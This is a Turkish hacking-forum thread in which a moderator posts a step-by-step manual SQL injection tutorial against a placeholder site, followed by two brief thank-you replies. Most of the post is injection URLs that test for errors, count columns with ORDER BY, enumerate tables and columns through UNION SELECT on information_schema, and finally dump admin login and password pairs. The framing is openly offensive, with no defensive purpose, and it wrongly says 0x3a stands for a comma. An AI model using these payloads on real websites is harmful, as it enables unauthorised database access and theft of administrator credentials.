World Hack Team Hacking & Security Platform





World Hack Team Hacking & Security Platform

Hacking & Security Platform...
 
AnasayfaSSSKullanıcı GruplarıKayıt OlGiriş yap

Paylaş | 
 

 // SQL İnjection Manual Hacking //

Aşağa gitmek 
YazarMesaj
Harictengazel
Kategori Moderatörü
Kategori Moderatörü
avatar

Mesaj Sayısı : 21
Rep Gücü : 43
Rep Puanı : 4
Kayıt tarihi : 21/12/15
Nerden : World Hack Team

MesajKonu: // SQL İnjection Manual Hacking //   25/12/2015, 14:38

*****************************************

Konu : // SQL İnjection Manual Hacking // Harictengazel

Başlayalım...

Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna " 'a " Ekliyoruz.
Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir.
Kod:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Kod:
www.örneksite.com/hack.php?id=1

Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye "+order+by+ "
Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır.

Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ;
Kod:
Kod:
www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var)
Kod:
www.örneksite.com/hack.php?id=1+order+by+4 (SQL Hatamız Kalktı.
Kod:
www.örneksite.com/hack.php?id=1+order+by+5 (Hala SQL Hatası Var)

Böylece Kolon Sayımızın 4 Olduğunu Bulduk.

Şimdiki Aşamamız Siteye "+union+all+select" Komutunu Çalıştırmaktır.İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,2,3,4

Şurada Kolon Sayısından Sonrasına : (Yani 4'den Sonrasına) " -- " Koyuyoruz.
İD Değerinden Öncesine : ( Yani İD=1'den Öncesine " id=-1 "
Kod:
www.örneksite.com/hack.php?id=-1+union+all+select+1,2,3,4--

Şimdi Ekrana Bir Sayı Çıkacak.Mesela 2 Sayısı Ekrana Geldi Site URL'mizde ;
2 Sayısının Yerine = group_concat(table_name)
Url En Sonuna'da = +from+information_schema.tables+where+table_schema =database()

NOT:Ekranda Sayıları Gördükten Sonra " -- " ve " - " İşaretlerini Siliyoruz.
Yani ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()

Ekrana Tableler Gelicek,Bize Şuradan admin,adminuser gibi tableler Lazım olucak,mesela admin seçelim..
Şimdi Sitenin Sonuna Yazdığımız Kodu Şöyle Değişelim:
Kod:
+union+all+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(hacklenmiş table kodu)--

Şimdi Tabloları Hacklemek İçin Bir Site'den Yardım Alacağız
Site: [Linkleri görebilmek için üye olun veya giriş yapın.]

Hacklemek İstediğimiz Tablo İsmini String Bölümüne Yazıyoruz.Admini Seçtiğimiz İçin Biz Admin Yazacağız. Yazdık Ve Bize kodu Verdi.

KOD : 97 100 109 105 110
[Resimleri görebilmek için üye olun veya giriş yapın.]

Ve Artık Site Sonuna Yazacağımız Kod Şöyle Oluyor ;
Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+seçdiğimiz table--

Bizim Seçdiğimiz Table admin Tablesi Olduğu İçin Kod Şöyle Oluyor.
Not:Şunuda Söyleyelimki login ve pass Arasında Yazdığımız 0x3a "," demek Ve Onu Mutlaka Yazmalısınız.

Ve Son Kodumuzu Yazıyoruz ve Admin Bilgileri Ekrana Geliyor... ;
Kod:
+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--

ve TAM Siteli Olan Hali ;
Kod:
www.örneksite.com/hack.php?id=1+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--

Şeklinde Anlatımımız Bitmiş Oluyor Smile  Allaha Emanet Olun Bir Kusurum Var İse ÖM Yoluyla İletebilirsiniz Bende Düzeltirim.
Saygılarımla.../Harictengazel
Sayfa başına dön Aşağa gitmek
Trojan
Amatör
Amatör
avatar

Mesaj Sayısı : 6
Rep Gücü : 9
Rep Puanı : 1
Kayıt tarihi : 25/12/15

MesajKonu: Geri: // SQL İnjection Manual Hacking //   25/12/2015, 15:50

Emeğinize sağlık yer imlerime ekledim daha sonra detaylı bakacam faydalı bir konu olmuş .
Sayfa başına dön Aşağa gitmek
Skorsky&#00
Lamer
Lamer


Mesaj Sayısı : 1
Rep Gücü : 1
Rep Puanı : 0
Kayıt tarihi : 05/07/16

MesajKonu: Geri: // SQL İnjection Manual Hacking //   5/7/2016, 10:33

good bro Smile
Sayfa başına dön Aşağa gitmek
 
// SQL İnjection Manual Hacking //
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
World Hack Team Hacking & Security Platform :: World Hack Team Under Ground :: Web & Server Güvenliği-
Buraya geçin: